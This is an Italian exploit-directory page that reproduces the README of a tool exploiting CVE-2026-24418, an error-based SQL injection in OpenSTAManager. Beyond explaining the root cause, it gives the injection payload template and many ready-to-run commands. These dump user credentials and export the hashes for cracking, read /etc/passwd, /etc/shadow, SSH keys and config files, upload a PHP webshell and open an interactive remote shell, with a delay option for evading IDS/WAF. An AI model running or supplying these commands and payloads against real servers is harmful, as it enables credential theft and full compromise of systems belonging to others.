Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24418 — OpenSTAManager v2.9.8 e precedenti contengono una vulnerabilità critica di SQL Injection basata su errori nel gestore delle operazioni in blocco per il modulo Scadenzario (Payment Schedule). | Kitploit
Strumenti/GitHubGitHub/bridgeralderson/cve-2026-24418
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingSicurezza dei Database

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
bridgeralderson/cve-2026-24418

CVE-2026-24418

OpenSTAManager v2.9.8 e precedenti contengono una vulnerabilità critica di SQL Injection basata su errori nel gestore delle operazioni in blocco per il modulo Scadenzario (Payment Schedule).

Vedi Repository
2103 mesi faNon ancora revisionato

CVE-2026-24418

OpenSTAManager <= 2.9.8 — SQL Injection basata su errori nel modulo operazioni bulk di Scadenzario

Panoramica

CampoDettagli
ID CVECVE-2026-24418
GravitàALTA (8.8)
CWECWE-89: SQL Injection
Versioni AffetteOpenSTAManager <= 2.9.8
Parametro Vulnerabileid_records[] (array POST)
Endpoint Vulnerabile/actions.php?id_module=18
Tipo di AttaccoSQL Injection basata su errori (EXTRACTVALUE)
AutenticazioneRichiesta (qualsiasi account utente valido)

Dettagli della Vulnerabilità

OpenSTAManager v2.9.8 e versioni precedenti contengono una vulnerabilità critica di SQL Injection basata su errori nel gestore delle operazioni bulk per il modulo Scadenzario (Piano di Pagamento). L'applicazione non convalida che gli elementi dell'array id_records[] siano interi prima di utilizzarli in una clausola SQL IN(), consentendo a utenti autenticati di iniettare comandi SQL arbitrari ed estrarre dati sensibili tramite messaggi di errore XPATH.

Causa Principale

  1. Punto di Ingresso — /actions.php riceve id_records[] tramite POST
  2. Sanificazione Insufficiente — array_clean() rimuove solo valori vuoti, NON convalida i tipi di dati
  3. Punto di Iniezione — /modules/scadenzario/bulk.php passa valori non sanificati direttamente in una clausola SQL IN()
  4. Esfiltrazione dei Dati — I messaggi di errore EXTRACTVALUE/UPDATEXML rivelano i risultati delle query

Funzionalità

FunzionalitàDescrizione
--infoImpronta digitale del server database (versione, utente, hostname, SO, percorsi)
--privsEnumerazione dei privilegi MySQL (FILE, SUPER, PROCESS)
--usersDump completo delle credenziali da zz_users con esportazione automatica degli hash
--dbsEnumera tutti i database accessibili
--tablesElenca le tabelle con conteggio righe
--columnsElenca le colonne con tipi e informazioni su nullable
--dumpEsfiltrazione dati da qualsiasi tabella/colonna
--sqlEsecuzione di query SQL personalizzate
--file-readLegge file del server tramite LOAD_FILE() (/etc/passwd, file di configurazione, chiavi SSH)
--file-read-hexLettura file codificata in HEX per bypassare filtri
--webshellCarica webshell PHP tramite INTO DUMPFILE
--rceEsecuzione interattiva di comandi tramite webshell caricata
-o / --outputSalva tutti i risultati in formato JSON, CSV e hashcat/john
--proxySupporto proxy HTTP (Burp Suite)
--delayLimitazione delle richieste per evasione IDS/WAF

Installazione

git clone https://github.com/BridgerAlderson/CVE-2026-24418.git
cd CVE-2026-24418
pip install requests

Utilizzo

Autenticazione

# Login with credentials
python3 exploit.py -t http://target.com -u admin -p password --info

# Use existing session cookie
python3 exploit.py -t http://target.com -c <PHPSESSID_VALUE> --info

Ricognizione

# Database info + privileges + user credentials
python3 exploit.py -t http://target.com -u admin -p secret --all

# Check MySQL privileges (FILE, SUPER, etc.)
python3 exploit.py -t http://target.com -u admin -p secret --privs

Estrazione Credenziali

# Dump users and auto-export hashes
python3 exploit.py -t http://target.com -u admin -p secret --users -o ./loot

# Output files:
#   ./loot/users.json          - Full user data
#   ./loot/users.csv           - CSV format
#   ./loot/hashes_hashcat.txt  - Hashcat format (mode 3200)
#   ./loot/hashes_john.txt     - John format (user:hash)

Enumerazione Database

# List all databases
python3 exploit.py -t http://target.com -u admin -p secret --dbs

# List tables in a specific database
python3 exploit.py -t http://target.com -u admin -p secret --tables -D openstamanager

# List columns of a table
python3 exploit.py -t http://target.com -u admin -p secret --columns -T zz_users

# Dump specific columns with row limit
python3 exploit.py -t http://target.com -u admin -p secret --dump -T zz_users -C username,password --limit 10

Lettura File (LFI tramite SQL)

# Read /etc/passwd
python3 exploit.py -t http://target.com -u admin -p secret --file-read /etc/passwd

# Read application config (database credentials)
python3 exploit.py -t http://target.com -u admin -p secret --file-read /var/www/html/openstamanager/config.inc.php

# Read SSH keys
python3 exploit.py -t http://target.com -u admin -p secret --file-read /home/user/.ssh/id_rsa

# HEX mode (bypass character filters)
python3 exploit.py -t http://target.com -u admin -p secret --file-read-hex /etc/shadow

Esecuzione Remota di Codice

# Upload webshell (auto-detects webroot)
python3 exploit.py -t http://target.com -u admin -p secret --webshell

# Upload webshell with specific webroot
python3 exploit.py -t http://target.com -u admin -p secret --webshell --webroot /var/www/html

# Interactive shell session
python3 exploit.py -t http://target.com -u admin -p secret --rce

# RCE will auto-upload webshell if none exists

Output e Reporting

# Save everything to a directory
python3 exploit.py -t http://target.com -u admin -p secret --all -o ./loot

# Generated files:
#   db_info.json, privileges.json, users.json, users.csv,
#   hashes_hashcat.txt, hashes_john.txt

Opzioni di Rete

# Through Burp Suite proxy
python3 exploit.py -t http://target.com -u admin -p secret --users --proxy http://127.0.0.1:8080

# With request delay (2 seconds between requests)
python3 exploit.py -t http://target.com -u admin -p secret --users --delay 2

# Skip SSL verification
python3 exploit.py -t https://target.com -u admin -p secret --info -k

Riferimento Completo delle Opzioni

Bersaglio:
  -t, --target           URL base del bersaglio

Autenticazione:
  -u, --user             Nome utente per il login
  -p, --password         Password per il login
  -c, --cookie           Valore PHPSESSID esistente

Enumerazione:
  -D, --database         Nome del database bersaglio
  -T, --table            Nome della tabella bersaglio
  -C, --columns-list     Colonne da estrarre (separate da virgola)
  --limit                Limite righe per i dump

Azioni:
  --info                 Informazioni sul server database
  --users                Dump delle credenziali di zz_users
  --dbs                  Enumera database
  --tables               Elenca tabelle
  --columns              Elenca colonne (richiede -T)
  --dump                 Estrai dati (richiede -T e -C)
  --sql QUERY            Query SQL personalizzata
  --all                  Esegui --info + --privs + --users
  --privs                Verifica privilegi MySQL

Operazioni sui File:
  --file-read PATH       Legge file tramite LOAD_FILE()
  --file-read-hex PATH   Legge file tramite codifica HEX

Esecuzione Remota di Codice:
  --webshell             Carica webshell PHP
  --webroot PATH         Percorso webroot per il caricamento della shell
  --rce                  Esecuzione interattiva di comandi

Output:
  -o, --output DIR       Salva risultati nella directory

Rete:
  -m, --module-id        ID del modulo (default: 18)
  --proxy                URL del proxy HTTP
  -k, --no-ssl-verify    Disabilita verifica SSL
  --delay                Ritardo richieste in secondi

Dettagli Tecnici

Struttura del Payload

id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(<SQL_QUERY>)))#

Limite di Caratteri EXTRACTVALUE

MySQL EXTRACTVALUE() restituisce al massimo ~32 caratteri tramite errori XPATH. Lo strumento suddivide automaticamente i risultati lunghi usando SUBSTRING():

SUBSTRING((<query>), 1, 31)    -- Chunk 1
SUBSTRING((<query>), 32, 31)   -- Chunk 2
...

Meccanismo di Caricamento Webshell

Scarica lo strumento